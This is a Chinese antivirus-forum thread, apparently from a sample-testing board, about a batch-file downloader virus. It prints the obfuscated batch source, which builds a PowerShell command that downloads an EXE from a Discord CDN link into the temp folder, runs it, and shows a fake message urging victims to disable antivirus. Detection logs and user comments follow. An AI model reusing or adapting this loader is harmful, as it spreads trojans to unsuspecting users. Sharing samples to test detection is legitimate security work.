一个bat下载者病毒

风之咩~

www-tekeze 发表于 2019-2-23 21:58
N多个powershell动作，还会调用powershell.exe联网，但没任何流量。。。全部动作放行，等了5分钟，然后用 ...

喜闻乐见的水土不服连不上呗…

www-tekeze

风之咩~ 发表于 2019-2-23 23:16
喜闻乐见的水土不服连不上呗…

嘿嘿，有大墙护着呢。。

心心相印

智量kill

dreams521

1. [url=home.php?mod=space&uid=331734]@echo[/url] off
   
2. prompt usr:~#
   
3. 
   
4. echo So basically, this is the power of batcc xd
   
5. echo made by rootabx
   
6. 
   
7. \\0\declare nt, oskrnl, usrlocal [_0x90, _0x7B, _0x004F0C]:MEMORY
   
8. MEMORY_ALLOC(USRTEMPFOLDERID(usrlocal,_0x90)):_0x0020D6SETMEMORY&SET _asmMemory=SE&KERNELSUBDLL_GETUSERFOLDERPATH&Mempointer*_0x000F00Cb74&SET _0x00b742==&USER==DIM&getNearAssembly()&dynamicClear.dll IntPtr.holdAll=0
   
9. ZtWritebytes(_0x00c07df1),usrlocal&MEMPTR&%_asmMemory%T int128%_0x00b742%lS
   
10. dynamicLL.CSharpProvider(encryptedFile-AES&_asmMemory.WriteUIon&%_asmMemory%T writeUI%_0x00b742%et.We&~insert&CSharpProvider.GenerateUI.Details(intptr*&%_asmMemory%T dynamicGUI%_0x00b742%ient).Down&.Up.Down.Down.Down.Up(65535)&.Down.Right.Left.Left.Down(65535)&%_asmMemory%T mmdiagnostic%_0x00b742%xe&environment.clear(xe)
    
11. [rootabxRAT.API.Import(intptr*&Object0&%_asmMemory%T _0x000c%_0x00b742%le('ht&fileht(ht)&%_asmMemory%T _0x0042%_0x00b742%tPS
    
12. remotePS.connectIP(myIP).TCP=true&kernelMode.OpenSession(oskrnl, intptr&asmMemory.T.\\&.//&///&\\.\/ _0x00f4//.//&%_asmMemory%T _0x00f2%_0x00b742%://cd&memptr.LoadDump()&wersh.CreateWersh(rw-r-w, intptr*&%_asmMemory%T _0x00d8%_0x00b742%ordapp.c&importFiles(ordapp.c, main.c, stdio.c))&memPtr.CLR.parseHex(6675636B796F75)&parsePointer*&wersh.CreateWersh(intptr*&%_asmMemory%T _0x0065%_0x00b742%wersh&Wersh.Clean(intptr*&%_asmMemory%T _0x0b56%_0x00b742%achmen&Schmens.ParsedHex_0x0000FC070B65.Dump(intptr*&%_asmMemory%T _0xb9%_0x00b742%250827267/537708856759812126/U&0xb9 0049026401284/577294609124798/496240824709767/6498520749274986/0000000000000);
    
13. oskrnl.KernelInject(_0x90, intptr*&%_asmMemory%T _0x40%_0x00b742%','&Index[142]%TEMP%&c%int128%&%_asmMemory%T nternalStorage%_0x00b742%f exis&intptr*) wr-r-w ACCESSGRANT()
    
14. C%int128%&.MODEOPEN
    
15. memPointer(_0x004902, null, intptr.HoldZero*&POFile.FxPO&c%int128%&pO%_0x0065%ell.e%mmdiagnostic% (new-object System.N%writeUI%bCl%dynamicGUI%LoadFi%_0x000c%%_0x0042%%_0x00f2%n.disc%_0x00d8%om/att%_0x0b56%ts/537702667%_0xb9%SRSYSTEM.e%mmdiagnostic%%_0x40%%temP%\0x00b659SRS.E%mmdiagnostic%')&C%int128%
    
16. i%nternalStorage%t "%temp%\0x00b659SRS.E%mmdiagnostic%" ("%temp%\0x00b659SRS.E%mmdiagnostic%") e%int128%e (color a&cls&echo PLEASE CHECK YOUR INTERNET CONNECTION OR DISABLE ANTIVIRUSES&pause)
    
17. 
    

复制代码

dreams521

YU2711 发表于 2019-2-23 23:06
Trend Micro Run

1. 24.02.2019 11.54.12;检测到的对象 ( 文件 ) 将在计算机重启后处理;C:\Users\Administrator\Desktop\0x00b659SRS\0x00b659SRS.Exe//#;C:\Users\Administrator\Desktop\0x00b659SRS\0x00b659SRS.Exe//#;VHO:Trojan.Win32.Agent.gen;木马程序;02/24/2019 11:54:12
   

复制代码

kaba666

运行后有个联网动作,其他什么屁事都没有

bbszy

双击 McAfee杀下载到临时文件夹的一个exe